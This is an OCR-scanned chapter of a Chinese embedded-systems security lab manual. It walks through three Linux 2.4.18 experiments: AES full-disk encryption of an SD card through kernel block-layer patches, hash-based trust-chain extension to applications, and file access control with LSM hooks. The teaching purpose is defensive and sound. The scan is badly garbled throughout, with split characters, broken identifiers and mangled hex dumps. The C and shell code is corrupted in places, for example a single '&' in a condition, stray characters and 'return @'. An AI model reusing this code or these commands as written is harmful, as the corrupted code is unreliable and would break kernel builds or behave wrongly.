SD 卡 的 全 盘 加 密 是 指 不 仅仅 加 密 磁盘 的 文件 系统 ,还 包括 启动 扇 区 和 保留 扇 区 ,也 
即 磁盘 上 的 所 有 数据 。 这 样 即使 攻击 者 获得 了 SD 卡 ， 也 不 能 获得 任何 有 用 的 信息 。 本 


实验 使 用 的 加 解密 算法 为 13.1 实验 所 用 的 AES 算法 。 

加 密 SD 卡 的 工作 方式 为 : 在 数据 实际 需要 写 入 存 
储 设备 前 才 进 行 加 密 , 在 数据 刚刚 从 存储 设备 中 读 出 时 
即 解密 。 这 样 保证 了 数据 在 缓冲 区 中 为 明文 , 充分 利用 
了 Linux 的 缓冲 机 制 以 提高 系统 性 能 。 

根据 以 上 原理 ， 通 过 在 内 核 源 码 中 查找 合适 的 位 
置 ， 如 图 13-3 所 示 ， 用 来 添加 具有 加 解密 功能 的 代码 ， 
从 而 实现 对 SD 卡 的 全 盘 加 密 。 

由 于 是 在 高 速 缓存 层 和 通用 块 层 之 间 添 加 了 数据 
加 解密 功能 ,因此 对 于 上 层 用 户 是 透明 的 , 使 用 户 感觉 
不 到 文件 的 加 密 过 程 , 不 修改 文件 系统 的 数据 结构 且 用 
户 访 问 加 密 文件 的 过 程 也 不 变 。 

【实验 环境 】 

硬件 : 2GB SD 卡 。 其 他 的 软件 和 硬件 环境 同 实验 
13:1, 


【实验 步骤 】 


用 户 层 
系统 调用 层 
文件 系统 层 


高 速 缓存 层 


加 密 模块 


通用 块 层 
IO 调度 层 
块 设备 驱动 层 
物理 块 设备 层 


图 13-3 ”SD 卡 全 盘 加 密 体系 结构 


(1) 从 kemel.org 下 载 Linux 2.4.18 内 核 源码 ， 并 将 其 解压 到 ~/kemel-2.4.18 目录 下 。 


[root@zxt smile]# cd /usr/src 


[root@zxt smile]# wget http://www.kernel.org/pub/linux/kernel/v2.4/ 


linux-2.4.18.tar.bz2 


[root@zxt smile]# tar jxf linux-2.4.18.tar.bz2 


(2) 在 源码 中 查找 加 密 的 位 置 。 


通过 在 内 核 源码 中 查找 ， 确 定 在 generic_make request 函数 中 进行 加 密 ， 它 是 在 


]1_rw_block.c 文件 中 定义 的 。generic_make_request 函数 是 由 文件 系统 层 进 入 通用 块 


层 的 
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入 口 函数 ， 该 函数 将 所 有 块 设备 的 IO 请 求 发 送 到 相应 的 块 设备 驱动 程序 的 请 求 处 理 函 
数 ， 从 而 对 存储 介质 进行 操作 。 修 改 代 码 如 下 : 


void generic make request (int rw,struct buffer head * bh) 


{ 


int major = MAJOR (bh->b rdev); 
// 通 过 宏 MAJOR 从 b_rdev 求 出 块 对 应 的 主 设备 号 

int minorsize = 0; 
request queue t *q; 
if (!bh->b_ end io) 

BUG(); 
if (blk_ size[major]) 

minorsize = blk_ size[major] [MINOR (bh->b_rdev)]; 
if(major == 60 & rw ==WRITE){  // 若 为 SD 卡 设备 ， 且 为 写 操作 


unseal () ; // 调 用 密 钥 管 理 模块 获取 密 钥 


aes_encode ();} // 在 提交 给 驱动 队列 前 调用 加 密 函 数 加 密 数 据 ; 


3} 


(3) 解密 位 置 的 确定 。 

根据 在 数据 块 刚 读 出 设备 时 进行 解密 的 方案 , 确定 在 缓冲 区 首部 的 b_end io 方法 中 
进行 解密 。b_end io 方法 的 作用 是 当 该 缓冲 区 上 的 IO 操作 结束 时 被 调用 。b_end io 方 
法 有 两 个 函数 ， 分 别 为 end_buffer io_async 和 end_buffer io_sync， 都 在 fs/Buffer.c 文件 
中 定义 。 作 业 块 传递 给 块 设备 驱动 程序 时 必须 处 于 BH_Lock 即 块 加 锁 状 态 : 当 块 的 读 写 
操作 成 功 时 , 块 设备 驱动 程序 通过 end_request 间接 调用 它 的 b_end io 方法 , 它 负责 设置 
作业 块 为 BH_Uptodate 刷新 状态 ， 清 除 块 的 BH_Lock 状态 。 


void end buffer io_sync(struct buffer head *bh, int uptodate) 
下 

unsigned int major; 

major = MAJOR (bh->b_dev); 


if (major == 60){ // 若 为 SD 卡 设备 
unseal (); // 调 用 密 钥 管 理 模块 获取 密 钥 
aes_decode () ;} // 在 设置 块 为 刷新 状态 以 及 解锁 前 调用 解密 模块 解密 数据 
mark buffer uptodate (bh, uptodate); // 设 置 块 为 刷新 状态 
unlock buffer (bh); // 解 锁 缓冲 区 块 
Put_bh (bh) 


} 


修改 的 end_buffer io async 函数 和 end_buffer io_sync 相同 ， 不 再 著述 。 

(4) 首先 使 用 make menuconfig 配置 内 核 ， 如 图 13-4 所 示 。 

(5) 选择 Device Drivers 选项 ， 按 Enter 键 进入 ， 选 中 MMC/SD 选项 ， 按 空格 键 使 
其 前 端 变 成 星 号 形状 ， 如 图 13-5 所 示 。 
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FLoating point emutation ---> 
Userspace binary formats ---> 
Power management options ---> 


[*] Metworking support ---> 

[evice orivers 
File Systems ---> 
Kernel hacking - 


Security options - 
图 13-4 make menuconfig 选中 设备 驱动 选项 


Eraphics support - 
[ ] Sound card support 
[*] HID Devices ---> 
[*] USB support ---> 
[meso/spro card support ~-- 


[ ] Sony MemoryStick card support (EXPERIMENTAL) ---> 
[ 
[ 
T 


> 


] Accessibility support ---> 
] LED Support ---> 
1 Switch class Support ---> 


图 13-5 ”选中 MMC/SD 卡 支持 选项 


(6) 使 用 make 命令 编译 生成 新 内 核 ， 并 将 其 下 载 到 实验 平台 上 。 经 测试 未 加 密 SD 
卡 与 加 密 过 的 SD 卡 的 前 512 字 节 分 别 如 图 13-6 和 图 13-7 所 示 。 


root@localhost:~ 


文件 (E) 编辑 (E) 查看 (YV) 终端 TI) 标签 (B) 帮助 (H) 


oo000; oooo 0000 0000 0000 0000 0000 0000 0000 ， 
poooo10: 0000 0000 0000 0000 0000 0000 0000 0000 
poo0020; 0000 0000 0000 0000 0000 0000 0000 0000 
poooo30; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo040: 0000 0000 0000 0000 0000 0000 0000 0000 
poooos0，0000 0000 0000 0000 0000 0000 0000 0000 
poooo80; 0000 0000 0000 0000 0000 0000 0000 0000 
poooo70，0000 0000 0000 0000 0000 0000 0000 0000 
poooo80; 0000 0000 0000 0000 0000 0000 0000 0000 
poooog90，0000 0000 0000 0000 0000 0000 0000 0000 
pooooa0， 0000 0000 0000 0000 0000 0000 0000 0000 
poooobo: 0000 0000 0000 0000 0000 0000 0000 0000 
pooooco; 0000 0000 0000 0000 0000 0000 0000 0000 
poooodo; 0000 0000 0000 0000 0000 0000 0000 0000 
pooooe0，0000 0000 0000 0000 0000 0000 0000 0000 
poooor0， 0000 0000 0000 0000 0000 0000 0000 0000 
pooo100; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo110; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo120; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo130; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo140; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo150; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo160; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo170; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo180; 0000 0000 0000 0000 0000 0000 0000 0000 
pooo190: 0000 0000 0000 0000 0000 0000 0000 0000 
booola0， 0000 0000 0000 0000 0000 0000 0000 0000 
poooib0; 0000 0000 0000 0000 0000 0000 0000 0000 
booolc0，0101 0e00 ffff 3f00 0000 beb3 le00 0000 
pooo1do; 0000 0000 0000 0000 0000 0000 0000 0000 
poooie0: 0000 0000 0000 0000 0000 0000 0000 0000 
pooo1fo: 0000 0000 0000 0000 0000 0000 0000 55aa 
hooo200: 0a 


13-6 未 加 密 SD 卡 前 512 字 节 
【实验 报告 】 
(1) 详细 叙述 实验 过 程 ， 通 过 在 源码 不 同位 置 添加 加 解密 函数 ， 测 试 能 否 正常 实现 
安全 存储 。 
(2) 分 析 加 解密 位 置 的 不 同 对 系统 性 能 的 影响 。 
【思考 题 】 
根据 实验 结果 确定 对 系统 性 能 影响 最 小 的 加 解密 位 置 。 
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root@localhost:~ 


文件 (FE) 编辑 (E) 查看 (VY) 终端 T) 标签 (B) 帮助 (H) 
|oo00000: 6bf4 7726 cc22 c109 1033 5597 2aa2 d45b k.wé 
Do00010: 6bf4 7726 cc22 ci09 1033 5597 2aa2 d45b 
|oo00020; 6bf4 7726 cc22 c109 1033 5597 2aa2 d45b 
pooo030: 6bf4 7726 cc22 c109 1033 5597 2aa2 d45b 
D000040: 6bf4 7726 cc22 ci09 1033 5597 2aa2 d45b 
Do00050; 6bf4 7726 cc22 ci09 1033 5597 2aa2 d45b 
D000060; 6bf4 7726 cc22 cl09 1033 5597 2aa2 d45b 
0000070，6bf4 7726 cc22 cl09 1033 5597 2aa2 d45b 
D000080: 6bf4 7726 cc22 cl09 1033 5597 2aa2 d45b 
|ooooo90，6bf4 7726 cc22 cl109 1033 5597 2aa2 d45b 
D0000a0; 6bf4 7726 cc22 ci09 1033 5597 2aa2 d45b 


Do000bO; 6bf4 7726 cc22 ci09 1033 5597 2aa2 d45b 
Doo00cO; 6bf4 7726 cc22 ci09 1033 5597 2aa2 d45b 
Doo00d0: 6bf4 7726 cc22 c109 1033 5597 2aa2 d45b 
|oooooeo，6bf4 7726 cc22 c109 1033 5597 2aa2 d45b 
DO000f0: 6bf4 7726 cc22 c109 1033 5597 2aa2 d45b 
|oo00100; 6bf4 7726 cc22 c109 1033 5597 2aa2 d45b 
0000110; 6bf4 7726 cc22 cl09 1033 5597 2aa2 d45b 
D000120; 6bf4 7726 cc22 c109 1033 5597 2aa2 d45b 
boo0130; 6bf4 7726 cc22 ci09 1033 5597 2aa2 d45b 
D000140; 6bf4 7726 cc22 cl09 1033 5597 2aa2 d4 串 
0000150; 6bf4 7726 cc22 ci09 1033 5597 2aa2 d45b 
pooo160:， 6bf4 7726 cc22 cl109 1033 5597 2aa2 d45b 
DO00170; 6bf4 7726 cc22 cl09 1033 5597 2aa2 d45b 
0000180; 6bf4 7726 cc22 ci09 1033 5597 2aa2 d45b 
hooo190; 6br4 7726 cc22 cl09 1033 5597 2aa2 d45b 
D0001a0; 6bf4 7726 cc22 cl09 1033 5597 2aa2 d45b 
pooolb0，6bf4 7726 cc22 c109 1033 5597 2aa2 d45b 
pooolc0，adcb 4135 34bc gde0 067c 152c cdfc 501b 
pooo1d0:， 6bf4 7726 cc22 c109 1033 5597 2aa2 d45b 
pooole0:，6bf4 7726 cc22 cl09 1033 5597 2aa2 d45b 
pooolf0，odfc 8557 b46b 4c8a 377f f684 dc92 gbbc 
0000200， 0a 
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图 13-7 加 密 后 SD 卡 的 前 512 字 节 


”3 风 入 式 平台 的 软件 信任 验证 


【实验 目的 】 
通过 本 次 实验 ， 深 入 理解 罕 入 式 平台 软件 信任 度量 模型 ， 掌 握 将 信任 链 从 操作 系统 
延伸 到 应 用 程序 的 方法 。 


【原理 简介 】 

信任 链 是 信任 度量 模型 的 技术 实施 方案 ， 通 过 信任 链 把 信任 关系 从 信任 根 扩展 到 整 
个 计算 机 系统 。 通 常情 况 下 的 信任 链 以 BIOS Boot Block 为 可 信和 度量 根 。 从 BIOS Boot 
Block 出 发 ， 经 过 BIOS， 到 OSLoader， 再 到 OS， 构 成 了 一 条 信任 链 。 沿 着 这 个 信任 链 ， 
一 级 度量 认证 一 级 ， 一 级 信任 一 级 ,确保 整个 平台 系统 资源 的 完整 性 ， 如 图 13-8 的 实 线 
部 分 。 

由 于 上 述 信任 链 仅仅 将 信任 链 延 伸 到 了 操作 系统 这 一 级 ， 所 以 无 法 对 应 用 程序 提供 
认证 保护 。 本 实验 尝试 将 信任 链 从 操作 系统 延伸 到 应 用 程序 。 因 为 嵌入 式 平台 上 的 应 用 
程序 数量 不 多 ， 需 要 保护 的 应 用 程序 数量 也 很 少 ， 所 以 在 操作 系统 层 对 这 些 需 要 保护 的 
应 用 程序 进行 完整 性 度量 和 信任 边界 的 延伸 是 完全 可 行 的 ， 如 图 13-8 的 虚线 部 分 。 

本 实验 首先 在 系统 首次 启动 时 使 用 Hash 程序 将 指定 应 用 程序 的 Hash 值 计 算出 来 并 
保存 在 安全 的 位 置 , 待 系统 重新 启动 时 再 对 指定 的 应 用 程序 计算 其 Hash 值 , 并 与 之 前 真 
实 值 比较 来 判断 程序 的 可 信 性 ， 这 样 就 实现 了 信任 链 到 应 用 程序 延伸 的 一 个 基本 原型 。 
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Os 


Cs) 
执行 流 FO OSLoader 
CQ) 


BIOS 


BIOS Boot Block 


图 13-8 ”信任 链 流程 图 


(本 实验 仅仅 针对 应 用 程序 本 身 , 对 在 运行 前 后 发 生变 化 的 数据 如 数据 库 文件 , 不 能 采用 
本 实验 的 方法 。 本 实验 也 没有 使 用 TPM 或 TCM 来 验证 从 启动 开始 到 OS 的 信任 链 ， 感 
兴趣 的 读者 可 参阅 可 信 PC 的 验证 方法 设计 。) 


【实验 环境 】 
软件 ， 可 运行 于 ARM9 的 Hash 程序 ， 该 程序 可 以 通过 实验 13.1 的 方法 自行 编写 验 
证 。 其 他 的 软件 和 硬件 环境 同 实 验 13.1。 


【实验 步骤 】 

1. 信任 链 延伸 的 设计 

信任 链 在 一 级 度量 一 级 的 时 候 是 先 延 伸 到 操作 系统 ， 然 后 再 由 操作 系统 延伸 到 应 用 
程序 ， 因 此 理想 的 方案 是 在 操作 系统 层 对 应 用 程序 的 完整 性 进行 度量 ， 方 案 如 下 

(1) 当 操 作 系统 启动 完毕 时 ， 启 动 脚本 ， 启 动 度量 程序 A。 

(2) A 从 存储 度量 值 的 位 置 读 取 存储 到 其 中 的 真实 的 度量 值 。 

(3) A 对 指定 的 应 用 程序 进行 完整 性 度量 。 

(4) A 将 步骤 (2) 读 出 的 真实 Hash 值 与 步骤 (3) 计算 出 的 Hash 值 进行 比 对 ， 如 
果 相 同 ， 则 提示 用 户 信 任 链 延 伸 成 功 ， 否 则 提示 用 户 信 任 链 延伸 失败 。 

2. 度量 程序 的 设计 

度量 程序 的 功能 是 对 指定 的 应 用 程序 进行 度量 ， 并 将 度量 值 与 真实 值 进行 比 对 ， 再 


根据 比 对 结果 报告 用 户 度量 是 否 成 功 ， 流 程 如 图 13-9 所 示 。 
报告 用 户 信任 
链 延 人 成 功 


取 真 实 的 度量 指定 的 与 真实 的 度 
度量 值 | “| 应 用 程序 | “| 量 值 进行 比 对 


报告 用 户 信任 
链 延 伸 失 败 


图 13-9 度量 程序 设计 流程 图 
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功 部 


系 

3. 度量 程序 的 代码 的 编写 

在 度量 程序 设计 完成 后 ， 要 用 嵌入 式 C 语言 把 它 实现 。 其 中 判断 信任 链 延 伸 是 否 成 
分 的 代码 如 图 13-10 所 示 。 


23 //comparing the true hash ot Application with now'S 

24 true hash = retreive hash('NameOfApplication'); 

25 now hash = cacutate_hash('NameOfAppLication'); 

26 if(true hash 一 now hash){ 

27 printf("Trust Extended Successfully!") 

28 return @; 

29 Jelse{ 

30 printf("Trust Extended Failed!,Application Aborted"); 
31 return 1; 


32 } 
TrustExtend.c”132L，2983C 已 写 入 122,9-1 底 端 


图 13-10 度量 程序 的 部 分 代码 


4. 度量 程序 的 代码 的 编译 
设置 好 相关 环境 变量 后 ， 用 交叉 编译 器 对 源码 使 用 如 下 命令 进行 交叉 编译 生成 可 执 


行文 件 duliang。 


armv4l-unknown-linux-gcc --static -o duliang TrustExtend.c 


5. 应 用 程序 可 信 性 的 验证 
将 生成 的 可 执行 文件 下 载 到 开发 板 上 , 并 将 含有 如 下 脚本 的 Shell 文件 添加 到 开机 启 


动 项 中 进行 测试 。 其 中 duliang，Applicateion 两 个 程序 要 添加 到 PATH 环境 变量 中 。 


#!/bin/bash 


duliang 1> /dev/null # 启 动 度量 程序 

if [ $? -eq 0 ];then # 判 断 度量 程序 返回 值 

echo "Trust Extedn Successfully!" # 如 果 为 零 , 则 信任 链 延 伸 成 功 , 报告 结果 
Application # 启 动 应 用 程序 

else # 否 则 报告 信任 链 延伸 失败 , 不 启动 应 用 程序 
echo "Trusted Extend Failed! Application Rborted" 

家 


运行 后 ， 屏 幕 会 输出 度量 的 结果 "Trust Extend Successfully!"， 说 明 信 任 链 延 促成 功 ， 


继而 启动 应 用 程序 ; 或 者 "Trusted Extend Failed! Application Aborted"， 说 明 信 任 链 延 伸 失 


沪 
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不 启动 应 用 程序 。 

【实验 报告 】 

(1) 详细 叙述 实验 过 程 ， 测 试 并 分 析 实 验 结果 。 

(2) 改动 信任 链 延 伸 程序 保护 的 软件 ， 查 看 实验 结果 并 分 析 。 
【思考 题 】 


(1) 如 何 保证 hash 值 存放 的 安全 性 ? 
(2) 针对 应 用 程序 的 信任 链 延 伸 有 什么 局 限 性 ? 


各 4 ”访问 控制 增强 机 制 设计 


【实验 目的 】 
通过 本 次 试验 ， 深 入 理解 Linux 安全 模块 (LSM) 与 Flask 安全 体系 结构 并 掌握 其 
实现 方法 。 加 深 体会 访问 控制 增强 机 制 对 于 嵌入 式 系统 安全 的 重要 性 。 


【原理 简介 】 

Linux 利用 存储 控制 方法 实现 的 自主 访问 控制 只 能 对 文件 的 所 有 者 及 其 所 在 的 组 和 
其 他 用 户 的 操作 权限 进行 设置 ， 并 且 操 作 类 型 也 只 有 读 、 写 、 执 行 三 种 。 其 缺点 为 root 
用 户 拥 有 一 切 权力 ， 而 客体 拥有 者 可 以 改变 客体 的 权限 位 ， 也 具有 将 授权 赋予 其 他 用 户 
的 权力 ， 同 时 这 样 对 文件 操作 权限 设置 的 粒度 较 粗 。 

为 了 实现 安全 更 强 的 文件 保护 ， 本 系统 细 化 了 访问 权限 的 粒度 ， 并 利用 强制 访问 控 
制 对 系统 实现 统一 的 资源 访问 控制 。 对 于 细 化 权限 粒度 ,首先 要 确定 需要 受 保护 的 文件 ， 
一 般 保护 系统 二 进 制 文件 和 系统 配置 文件 ， 其 次 要 决定 保护 文件 的 访问 权限 类 型 。 本 系 
统 提供 4 种 保护 类 型 ， 如 图 13-11 所 示 。 


权限 类 型 权限 说 明 

DENY 拒绝 任何 主体 访问 ， 用 于 敏感 文件 的 隐藏 
READONLY 任何 主体 不 能 修改 带 有 只 读 标记 的 文件 

APPEND 文件 可 读 ， 且 只 能 以 追加 的 形式 写 

WRITE 文件 可 读 可 写 


图 13-11 访问 控制 增强 的 访问 权限 类 型 


因为 系统 调用 是 发 出 资源 访问 请 求 和 触发 安全 相关 行为 的 地 方 ， 所 以 本 系统 访问 控 
制 增强 功能 的 实施 是 通过 修改 文件 系统 调用 实现 的 。 其 原理 为 在 系统 调用 中 ， 截 获 资 源 
访问 请 求 ， 根 据 访问 控制 策略 实施 权限 检查 ， 判 断 操作 是 否 被 授权 ， 从 而 对 重要 文件 进 
行 保护 。 其 中 访问 策略 的 实施 是 通过 LSM 提供 的 接口 以 及 Flask 安全 体系 结构 实现 的 ， 
如 图 13-12 所 示 。 

Linux 安全 模块 框架 LSM (Linux Security Modules) 是 Linus Torvalds 等 人 发 布 的 
Linux 内 核 补丁 , 支持 多 种 安全 策略 的 底层 架构 , 是 Linux 内 核 的 一 个 轻 量 级 通用 访问 控 
制 框 架 。LSM 在 内 核 数据 结构 中 添加 了 安全 相关 的 字段 ， 保 存 安 全 属性 ， 在 内 核 代码 中 
的 关键 点 添加 了 钧 子 函数 ， 用 于 管理 安全 属性 、 实 施 访 问 控制 ， 这 些 钩子 函数 本 身 不 提 
供 安全 功能 ， 只 是 一 组 接口 函数 。 开 发 人 员 可 以 利用 此 框架 提供 的 标准 接口 开发 访问 控 
制 模块 ， 然 后 插入 内 核 ， 提 供 安全 功能 。 


【实验 环境 】 
软件 和 硬件 环境 同 实验 13.1。 
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LSM 接 口 | Flask 安 全 体系 结构 


访问 客体 


图 13-12 访问 控制 体系 结构 


【实验 步骤 】 
(1) 从 kemel.org 下 载 Linux 2.4.18 内 核 源码 ， 并 将 其 解压 到 ~/kernel-2.4.18 目录 下 。 


[root@zxt smile]# cd /usr/src 

[root@zxt smile]# wget http://www.kernel.org/pub/linux/kernel/v2.4/ 
linux-2.4.18.tar.bz2 

[root@zxt smile]# tar jxf linux-2.4.18.tar.bz2 


(2) 为 内 核 源码 打 LSM 的 补丁 。 


[root@zxt smile]# cd linux-2.4.18.tar.bz2 

[root@zxt smile]# wget http://archive.debian.org/debian/pool/main/k/ 
kernel-patch-2.4-lsm 

/kernel-patch-2.4-lsm 2002.03.14-1.tar.gz 

[root@zxt smile]# tar zxf kernel-patch-2.4-lsm 2002.03.14-1.tar.gz 
[root@zxt smile]# patch -pl < kernel-patch-2.4-lsm-2002.03.14/lsm- 
full-2002 01 15-2.4.17 

.patch 


(3) 钧 子 函数 的 实现 。 
使 用 vi 打开 fs/Namei.c， 找 到 file permission 函数 (如 下 ) 并 修改 ， 使 其 实现 对 上 


述 细 粒 度 权 限 的 操作 。 


[root@zxt smile]# vi fs/Namei.c 
int file permission(struct file *file, int mask) 
|! 
return inode permission (file->f path.dentry->d inode, mask); 


} 
其 余 钧 子 函 数 的 实现 如 上 所 述 。 在 实现 了 需要 的 钧 子 函 数 后 ， 使 用 函数 


register_secutity() 将 LSM 框架 注册 到 内 核 中 。 
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(4) 以 sys_read 系统 调用 为 例 实现 对 系统 调用 的 拦截 。 
[root@zxt smile]# vi fs/read write.c 


使 用 vi 编辑 fs/read_write.c 文件 , 修改 sys_read 系统 调用 ,在 sys_read 函数 内 部 (162 
行 位 置 ) 添加 security_file_permission 函数 来 拦截 系统 调用 。 然后 security_file_permission 
函数 调用 钧 子 函 数 security_ops->file_permission 来 检查 请 求 权 限 是 否 允 许 。 有 关 文 件 访 
问 控制 的 系统 调用 修改 方法 如 上 所 述 。 

(5) 编译 内 核 并 将 其 下 载 到 开发 板 上 ， 测 试 实验 结果 。 

在 /root/mac 的 目录 下 新 建 了 文件 test_ deny、test readonly、test_ append 和 目录 test， 
分 别 测试 文件 的 拒绝 、 只 读 、 只 追加 和 目录 的 拒绝 访问 功能 。 访 问 控制 的 配置 命令 为 
mac_conf， 如 图 13-13 所 示 列 出 了 客体 的 安全 属性 列表 。 


|[zootelocalhost mac]# mac_conf -L 
LIST 
Subject ACCESS inherit time Object 
| Any file DENY: 0 0000-0000 /root/mac/test_deny 0 
| Any file DENY: 0 0000-0000 /root/mac/test 0 
| Any file READONLY: 0 0000-0000 /root/mac/test_readonly 0 
Any file APPEND: 0 0000-0000 /root/mac/test_append 0 
| 
[rootelocalhost mac]# 四 = 


图 13-13 ”客体 的 安全 属性 列表 


测试 设置 为 拒绝 访问 的 文件 和 目录 ， 终 端 显示 为 没有 此 文件 或 目录 ， 即 设置 了 拒绝 
访问 的 客体 被 系统 隐藏 了 ， 如 图 13-14 所 示 。 


~v EE 


Erootelocalhost mac]# ls test_deny 

1s: test_deny: No such file or directory 
| [rootelocalhost mac]# ls test 

|1s: test: No such file or directory 
[rootelocalhost mac]# 目 


图 13-14 测试 属性 为 拒绝 访问 的 客体 


测试 设置 为 只 读 的 文件 。 利 用 命令 重 写 和 追加 test_readonly 文件 时 ， 终 端 均 显示 为 
操作 被 禁止 。 使 用 cat 显示 未 经 修改 的 文件 内 容 ， 表 明 只 读 文件 不 可 以 被 修改 和 追加 ， 
如 图 13-15 所 示 。 

[root@localhost mac]# echo "write to it"> ./test_readonly 


bash: ./test_readonly: Operation not permitted 
[root@localhost mac]# echo "write to it">> ./test_readonly 


bash: ./test_readonly: Operation not pernitted 
| [rootalocalhost mac]# cat ./test_readonly 
|this is a test of readonly capability for MAC. 
[rootelocalhost mac]# 目 


图 13-15 测试 属性 为 只 读 的 客体 
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测试 设置 为 只 追加 的 文件 。 利 用 命令 重 写 test_append 文件 时 , 终端 显示 操作 被 禁止 ， 
而 利用 命令 追加 test_append 文件 时 ， 人 允许 操作 。 使 用 cat 显示 追加 后 的 文件 内 容 ， 表 明 
只 追加 文件 不 可 以 被 修改 但 可 以 追加 ， 如 图 13-16 所 示 。 


[root@localhost mac]# echo "write to it"> ./test_append 
lbash: ./test_append: Operation not permitted 
[root@localhost mac]# echo "write to it">> ./test_append 


[root@localhost mac]# cat ./test_append 
this is a test of append capability for MAC. 


write to it 


图 13-16 ”测试 属性 为 只 追加 的 客体 


【实验 报告 】 

(1) 详细 叙述 实验 过 程 ， 对 文件 设置 不 同 的 访问 权限 ， 测 试 并 分 析 实 验 结果 。 
(2) 通过 修改 钩子 函数 实现 对 文件 更 多 访问 控制 并 测试 实验 结果 。 

【思考 题 】 

思考 如 何 更 好 地 改善 戏 入 式 系统 性 能 的 LSM 实现 架构 。 
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